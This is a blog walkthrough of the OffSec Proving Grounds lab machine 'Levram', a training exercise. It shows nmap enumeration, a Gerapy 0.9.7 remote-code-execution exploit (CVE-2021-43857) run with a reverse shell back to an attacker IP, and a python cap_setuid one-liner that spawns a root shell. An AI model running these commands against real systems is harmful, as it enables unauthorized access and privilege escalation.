Post

Proving Grounds: Levram

Machine Walkthrough

Posted
Preview Image
By hx77
4 min read

OffSec Proving Grounds Walkthrough: Levram

Table of Contents

  1. Introduction
  2. Information Gathering
  3. Exploitation
  4. Conclusion

Introduction

  • Machine Name: Levram
  • IP: 192.168.213.24
  • Points: 10
  • Difficulty Level: Easy
  • Operating System: Linux
  • Objective: This walkthrough details the process of identifying and exploiting vulnerabilities in the Levram system to achieve root access. The goal is to gain both user and root flags.

We are starting the journey with an easy box called “Levram”, I am going to tackle this in 4 steps:

1) Information Gathering 2) Exploitation 3) Post-Exploitation

and at the end I’ll give you my conclusion of the box :)

Let’s begin!

Information Gathering

Initial Enumeration

Tool Used: Nmap

I begin by scanning the target machine to identify any open ports, I know this box is easy so I’m starting with the bare basics as I don’t think there’s too much to it.

nmap -p- -sV 192.168.213.24

Nmap scan report for 192.168.213.24
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8000/tcp open http-alt WSGIServer/0.2 CPython/3.10.6

from this initial scan I can see that there’s a webpage being served over at 192.168.213.24:8000, going to that page, I see:

website

it looks like I will have to guess the username/password but first things first, I “inspect” the page for any comments or anything that can point me to an username or password, this lead me nowhere…. but I do have the words “gerapy”

Tool Used: searchsploit
Using searchsploit I search for “gerapy”, this search returned a vulnerability on Gerapy 0.9.7 that leads to a remote code execution. I don’t know what version of gerapy I am looking at, at least, not yet.

searchsploit

next in line is to inspect the code for that vulnerability, I used the below flag to get the path of the file and copy the file into another directory for usage
searchsploit -p 50640

searchsploit2

I went ahead and loaded the code to inspect it to see what it does and right in front of my nose I see “username/password”
up

well, that made things a lot simpler… I went ahead and logged in into the website with those credentials to see what it was

website1

at the bottom of the page I can see the gerapy version, 0.9.7! woot! that means the exploit will work!, lets continue reading the exploit to see what else I can find out…. in lines 80 and 81 I can see that I need to have a project ID - right now that website doesn’t have any projects so the code will most likely fail if I run it.

quit

I am currently logged in as the admin - so let’s add a project and see what happens

project

it looks like I have the option to upload, close and create. I will go with create to begin with to see what happens when the code is executed, I’ll adjust my approach if I get a failure.

project1 ok so we got everything ready to try the exploit! lets goooo!

Exploitation

Gaining Initial Access

Running the python script with all the required flags and a netcat listener ready to go gave me the initial foothold on the machine.

  • Exploit Used: CVE-2021-43857
  • Command:
    python3 exploit.py -t 192.168.213.24 -p 8000 -L 192.168.45.194 -P 1234
  • Outcome: Gained access as ‘app’

foothold

First flag was found!

local_proof

Privilege Escalation

The purpose of this step is to gain initial access level to root or admin.

  • Tool Used: Manual methods
  • Vulnerability Found: python!
  • Exploit Method:
    [exploit command]
  • Outcome: Root access obtained.

I looked around in the pc for a bit but couldn’t find anything useful and for a bit I was stuck :/
Then I went back to my checklist DUH! (I used this site to populate some of my items in the checklist - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

so I started with scanning the file system for files with capabilities using getcap -r /   The -r flag tells getcap to search recursively, / to indicate that we want to search the whole system, but I also don’t want to see all the output because of the errors that will come up, so I used 2>/dev/null which yeets the output errors of the command to a blackhole.

  • Command:
    getcap -r / 2>/dev/null

getcap

from that list I can see python3 and that it has cap_setuid set! soooo lets try to break out of the shell using

  • Command:
    ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
    I edited it to reflect the path of the binary
    /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
    this command is used as a backdoor to maintain privileged access by manipulating its own process UIDl (https://gtfobins.github.io/gtfobins/python/)

It worked! I navigated to “root” and was able to get the final flag “proof.txt”

root
Done!

Conclusion

  • Summary: This walkthrough covered the steps from initial enumeration to privilege escalation in the Levram box from proving grounds.
  • Reflection: I think this was a very good box due to the complexity of the privilege escalation, overall I liked it! Rating: 4/10.
walkthrough, proving_grounds
proving_grounds machines walkthrough
This post is licensed under CC BY 4.0 by the author.